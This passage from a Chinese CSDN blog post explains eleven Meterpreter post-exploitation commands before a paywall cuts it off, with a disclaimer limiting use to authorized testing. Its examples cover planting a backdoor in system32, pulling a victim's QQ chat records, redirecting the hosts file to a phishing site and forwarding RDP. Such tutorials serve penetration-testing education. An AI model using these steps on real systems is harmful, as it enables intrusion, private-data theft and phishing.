Meterpreter模块32个命令用法

最新推荐文章于 2024-07-15 14:23:16 发布
最新推荐文章于 2024-07-15 14:23:16 发布
阅读量1.6k 收藏 17
点赞数 1
分类专栏: 渗透测试 linux tools
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haha13l4/article/details/90180934
版权
本文详细介绍了Meterpreter在渗透测试中的32个常用命令,包括background、session、shell、cat、getwd、upload、download、edit、search、ipconfig、portfwd、route、getuid、sysinfo、ps、migrate、execute、getpid、shutdown、enum_drives、checkvm、persistence、metsvc、getgui、getsystem、keyscan、hashdump、enum_applications、dumplinks、enum_ie、route、get_local_subnets、clearev等,涵盖了会话管理、系统控制、网络通信、信息收集等多个方面。
摘要由CSDN通过智能技术生成

仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备。
1、background命令
返回,把meterpreter后台挂起
2、session命令
session 命令可以查看已经成功获取的会话
可以使用session -i 连接到指定序号的meterpreter会话已继续利用
3、shell命令
获取目标主机的远程命令行shell
如果出错,考虑是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理员用户进程中再尝试
在这里插入图片描述
4、cat命令
查看目标主机上的文档内容
例如:cat C:\boot.ini 查看目标主机启动引导信息
在这里插入图片描述
5、getwd命令
获取系统工作的当前目录
6、upload命令
上传文件到目标主机,例如把后门程序setup.exe传到目标主机system32目录下
upload setup.exe C:\windows\system32
在这里插入图片描述
7、download命令
把目标主机上的文件下载到我们的攻击主机上
例如:把目标主机C盘根目录下的boot.ini文件下载到攻击主机的/root/目录下
download C:\boot.ini /root/
在这里插入图片描述
download C:\“Program Files”\Tencent\QQ\Users\295******125\Msg2.0.db /root/
把目标主机上的QQ聊天记录下载到攻击主机的root目录下(仅实验用途,是否要考虑变更你QQ程序的安装路径了呢)
8、edit命令
调用vi编辑器,对目标主机上的文件修改
例如修改目标主机上的hosts文件,使得目标主机访问baidu时去到准备好的钓鱼网站(仅限实验用途)
在这里插入图片描述
9、search命令
在目标主机文件系统上查找搜索文件
例如:search -d c:\ -f *.doc
在目标主机C盘下搜索doc文档
10、ipconfig命令
这个不多说,查看目标主机上的网络参数
11、portfwd命令
端口转发
例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开
例如:portfwd add -l 1122 -p 3389 -r 192.168.250.176
把目标主机192.168.250.176的3389端口转发到1122端口
这是只需要连接目标的1122端口就可以打开远程桌面了
rde

最低0.47元/天 解锁文章
haha13l4
关注
专栏目录
Metasploit 安装教程
温氏效应
11-22 3826
Rapid7 为 Linux,Windows 和 OS X 操作系统上的 Metasploit 框架提供了开源安装程序。Metasploit 安装程序附带了运行 Metasploit 框架所需的所有必需依赖项。它包括 msfconsole 并安装了相关的工具,例如 Ripper 和 Nmap。
meterpreter会话渗透利用常用的32命令归纳小结
至臻求学,胸怀云月
01-25 1850
仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备。 1、background命令 返回,把meterpreter后台挂起 2、session命令 session 命令可以查看已经成功获取的会话 可以使用session -i 连接到指定序号的meterpreter会话已继续利用 3、shell命令 获取目标主机的远程命令行shell 如果出错,考
metasploit快速入门(一)安装部署
whatday的专栏
11-03 8681
目录 简介 1 在Windows上安装Metasploit 2在Linux和MacOS上安装Metasploit 3在Kali Linux上使用Metasploit 4升级Kali Linux 5构建渗透测试实验环境 6配置SSH连接 7使用SSH连接到Kali 8配置PostgreSQL数据库 9创建工作区 10使用数据库 11 使用 hosts 命令 ...
【2023最新版】超详细Metasploit安装保姆级教程,Wireshark抓包(网络分析),收藏这一篇就够了
Python_0011的博客
02-13 1137
Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit,使用框架以及利用漏洞。
meterpreter命令
weixin_33908217的博客
02-13 172
meterpreter详解与渗透实战 基本命令: background quit shell irb client.sys.config.sysinfo() 调用windows API:client.core.use("railgun") 弹出会话窗口:client.railgun.user32.MessageBoxA(0,"hello!world",NULL,MB_OK) 防止休眠:clien...
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
Meterpreter 不仅仅是一个简单的 shell,它是一个完整的后渗透环境,支持多种扩展模块和功能。它能够创建持久化的连接,即使在目标系统重启后也能保持控制。此外,Meterpreter 还允许测试者在不同的会话之间切换,...
E026-渗透测试常用工具-使用meterpreter模块进行后渗透测试.pdf
12-02
本课程主要讲解如何使用Meterpreter模块进行后渗透测试。 首先,了解MeterpreterMeterpreter是一种动态的、交互式的远程控制工具,它是Metasploit框架的一部分。它可以在多种操作系统上运行,包括Windows、Linux...
meterpreter 简单应用
发哥微课堂
01-12 2251
0x00:介绍 使用 metasploit 渗透下一台主机后,并不意味着渗透测试的结束,而接下来需要做的就是后渗透阶段,后渗透阶段在已经拿下目标主机的前提下,进行一系列获取敏感信息、利用这台机器为跳板机做其他主机的攻击等,主要使用的是 metasploit 中的 post 模块,也就是后渗透模块metasploit 也提供了一个后渗透的工具,就是 meterpretermeterpret...
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3912
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   MeterpreterMetasploit 框架中的一...
meterpreter环境下的命令
12-13
非常值的一个东西,就是你使用msf平台攻进靶机后的meterpreter下的所有命令集都有详细的讲解,非常好
Metasploit安装教程,三分钟手把手教会,非常简单
Python_0011的博客
12-29 1741
【准备工作】
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-15 867
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令
Metasploit超详细安装及使用教程(图文版)
hack0919的博客
05-27 5158
本文主要以Kali Linux为主。因为Kali Linux预装了 Metasploit框架和运行在框架上的其他第三方工具
如何安装metasploit
m0_62395433的博客
03-17 2740
1. 找到安装路径的bin文件夹,复制路径 打开环境变量,设置环境变量
Metasploit安装
小小鱼的博客
02-06 2056
0. 环境 Deepin 15.5 SP2专业版 其他基于Debian的linux发行版也可参考 1. 安装 metaspliot的源码托管在github,链接如下 https://github.com/rapid7/metasploit-framework 官方网站如下: https://metasploit.com/ 可以选择付费版的Metasploit pro或者免费的metasploit-framework进行下载,这里选择下载免费版,下载指导如下: https://github.
metasploit安装
xqhlsjslcy的博客
06-17 375
https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
metasploit的安装
qq_25205059的博客
09-20 318
inux 软件包是为 .deb(i386、amd64、armhf、arm64)和 .rpm(64 位 x86)系统每晚构建的。Debian/Ubuntu 软件包位于https://apt.metasploit.com和 CentOS/Redhat/Fedora 软件包位于https://rpm.metasploit.com。 数据库: apt-get install postgresql service postgresql start 初始化数据: msfdb reinit 进入控制台: msfc.
Meterpreter扩展模块深度解析:功能与优势
"MSF Meterpreter扩展模块命令详解文档主要介绍了Meterpreter的概念、功能以及技术优势。MeterpreterMetasploit框架中的一个重要组件,用于溢出攻击后的后续控制,提供了一个强大的后渗透工具集。" Meterpreter是...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值